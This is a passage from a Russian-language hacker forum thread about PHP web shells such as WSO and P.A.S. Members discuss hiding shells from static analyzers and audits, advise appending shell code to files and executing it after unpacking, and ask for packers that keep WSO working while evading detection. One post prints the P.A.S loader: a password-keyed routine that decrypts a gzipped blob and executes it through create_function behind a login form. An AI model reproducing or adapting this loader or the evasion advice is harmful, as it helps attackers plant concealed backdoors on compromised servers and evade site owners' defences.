Старый 02.11.2013, 14:10   #161
Enigma
 
Аватар для Enigma
 
Регистрация: 17.06.2013
Сообщений: 37
Репутация: 12
По умолчанию

У меня вот такой вопрос.

Когда пишешь в консоль на шелле какую-нибудь команду которая долго исполняется не получается обращаться к шеллу в новой вкладке с того же самого браузера(файрфокс), а с другого браузера всё получается.

Сам сайт при этом нормально отображается в обоих браузерах.

Почему так происходит с технической точки зрения?
Enigma вне форума   Ответить с цитированием
Старый 04.11.2013, 10:10   #162
shampoo
 
Регистрация: 30.10.2013
Сообщений: 10
Репутация: 1
По умолчанию

Цитата:
Сообщение от colobos Посмотреть сообщение
Извините, но не совсем понятно, как этим пользоваться. На выходе мы получаем кодированный gzdeflate скрипт, но как его юзать, чтобы он работал? Я так понимаю Ravenous интересовался как обфусцировать какой-либо шелл, оставив его при этом работоспособным.
Там как бы евал в начале, достаточно в код глянуть.
shampoo вне форума   Ответить с цитированием
Старый 04.11.2013, 11:55   #163
profexer
 
Регистрация: 06.01.2011
Сообщений: 117
Репутация: 63
По умолчанию

Цитата:
Сообщение от Enigma Посмотреть сообщение
У меня вот такой вопрос.

Когда пишешь в консоль на шелле какую-нибудь команду которая долго исполняется не получается обращаться к шеллу в новой вкладке с того же самого браузера(файрфокс), а с другого браузера всё получается.

Сам сайт при этом нормально отображается в обоих браузерах.

Почему так происходит с технической точки зрения?
Потому что блокируется файл сессии на время выполнения команды.
А так как другой браузер не привязан к текущей сессии, то при запросе сервер не ждет освобождения дескриптора файла, а открывает новую сессию.
Для того, чтоб такого не происходило, необходимо закрывать сессию перед началом исполнения команды.
profexer вне форума   Ответить с цитированием
Старый 07.11.2013, 15:30   #164
KeyTeam
 
Регистрация: 04.08.2012
Сообщений: 33
Репутация: 0
По умолчанию

как отправить через консоль шелла 2ой таб для получения списка всех программ сервера?
+ ещё подтверждение "yes"

Последний раз редактировалось KeyTeam; 07.11.2013 в 16:26..
KeyTeam вне форума   Ответить с цитированием
Старый 07.11.2013, 18:50   #165
Enigma
 
Аватар для Enigma
 
Регистрация: 17.06.2013
Сообщений: 37
Репутация: 12
По умолчанию

Насчёт двух табов не подскажу, yes же можно оправить через пайп: `yes что_ты_хочешь_чтоб_писало | program`.
Enigma вне форума   Ответить с цитированием
Старый 08.11.2013, 08:43   #166
oRb
 
Аватар для oRb
 
Регистрация: 01.07.2010
Сообщений: 319
Репутация: 138
По умолчанию

это веб-шелл, а не баш с автокомплитом.
__________________
Не оказываю никаких услуг.
I don't provide any services.
oRb вне форума   Ответить с цитированием
Старый 08.11.2013, 10:34   #167
KeyTeam
 
Регистрация: 04.08.2012
Сообщений: 33
Репутация: 0
По умолчанию

Цитата:
Сообщение от oRb Посмотреть сообщение
это веб-шелл, а не баш с автокомплитом.
ну всётаки хотелось бы найти способ реализовать это, способ наверника должен быть
KeyTeam вне форума   Ответить с цитированием
Старый 15.11.2013, 10:21   #168
colobos
 
Регистрация: 15.08.2012
Сообщений: 9
Репутация: 0
По умолчанию

Цитата:
Сообщение от shampoo Посмотреть сообщение
Там как бы евал в начале, достаточно в код глянуть.
И? Как это все работает?

KMОИWИM1Х042615УґV

Это вывод Вашего скрипта, что является кодированным gzdeflate <?php echo md5(123456); ?>. Человек же спрашивал:

Как упаковать WSO, как P.A.S таким образом? Есть такие обфускаторы в паблике?

т.е. как его упаковать, чтобы сделать его трудным для анализа, и при это на выходе все работало как полагается.
colobos вне форума   Ответить с цитированием
Старый 15.11.2013, 10:57   #169
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Цитата:
Сообщение от colobos Посмотреть сообщение
Как упаковать WSO, как P.A.S таким образом? Есть такие обфускаторы в паблике?

т.е. как его упаковать, чтобы сделать его трудным для анализа, и при это на выходе все работало как полагается.
Разве имеет смысл обфусцировать доступный шелл? Обычно это не требуется, необходимо или скрыть код от статического анализатора, или спрятать его так, что-бы он устоял при аудите. Для последнего используют бэкдоры (Не тянут за собой весь инструментарий).

Для первого код-шелла помещают в конце файла/переменную и после распаковки исполняют. Обфускация используется в тех случаях, когда необходимо скрыть алгоритм, затруднить его анализ. Внешний вид в любом случае останется подозрительный.

Последний раз редактировалось NameSpace; 15.11.2013 в 12:16..
NameSpace вне форума   Ответить с цитированием
Старый 15.11.2013, 21:03   #170
Ravenous
 
Аватар для Ravenous
 
Регистрация: 14.07.2012
Сообщений: 64
Репутация: 1
По умолчанию

Цитата:
Сообщение от NameSpace Посмотреть сообщение
Разве имеет смысл обфусцировать доступный шелл? Обычно это не требуется, необходимо или скрыть код от статического анализатора, или спрятать его так, что-бы он устоял при аудите. Для последнего используют бэкдоры (Не тянут за собой весь инструментарий).

Для первого код-шелла помещают в конце файла/переменную и после распаковки исполняют. Обфускация используется в тех случаях, когда необходимо скрыть алгоритм, затруднить его анализ. Внешний вид в любом случае останется подозрительный.
Согласен. Первостепенная цель защитить щелл от статических анализаторов типа ai-bolit и т.п. А почему спросил именно как P.A.S(вариант 2), дело в том, что там нет подозрительных функций.
PHP код:
<?php $wp__wp='
¶Cб˜L“w†Оґќ[ЊU±Љф}ҐПНmA    &Ыy&ЖЗ!#јVМпS˜н+§];3ЯёG~БћёЕqјњџП    ¶-*B№кkс…Јf^ШНЂ4cїВЧЖ/+
...
PHP код:
$wp_wp=isset($_POST['wp_wp'])?$_POST['wp_wp']:(isset($_COOKIE['wp_wp'])?$_COOKIE['wp_wp']:NULL);if($wp_wp!==NULL){$wp_wp=md5($wp_wp).substr(md5(strrev($wp_wp)),0,strlen($wp_wp));for($wp___wp=0;$wp___wp<15185;$wp___wp++){$wp__wp[$wp___wp]=chr(( ord($wp__wp[$wp___wp])-ord($wp_wp[$wp___wp]))%256);$wp_wp.=$wp__wp[$wp___wp];}if($wp__wp=@gzinflate($wp__wp)){if(isset($_POST['wp_wp']))@setcookie('wp_wp'$_POST['wp_wp']);$wp___wp=create_function('',$wp__wp);unset($wp__wp,$wp_wp);$wp___wp();}}?><form action="" method="post"><input type="text" name="wp_wp" value=""/><input type="submit" value="&gt;"/></form> 
только gzip и обфусцированный распаковщик.
Например WSO 2.5 спалится уже только по наличию preg_replace. Поэтому и спросил, нет ли у кого скрипта, чтобы запакавать так WSO 2.5, (потому что wso больше нравится по юзабилити).

Кстати кто-нибудь сталкивался, когда ids/ips или модуль типа mod_security палил шелл по ответу сервера? существуют такие настройки?
Ravenous вне форума   Ответить с цитированием
Ответ

Метки
shell, wso, wso2

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot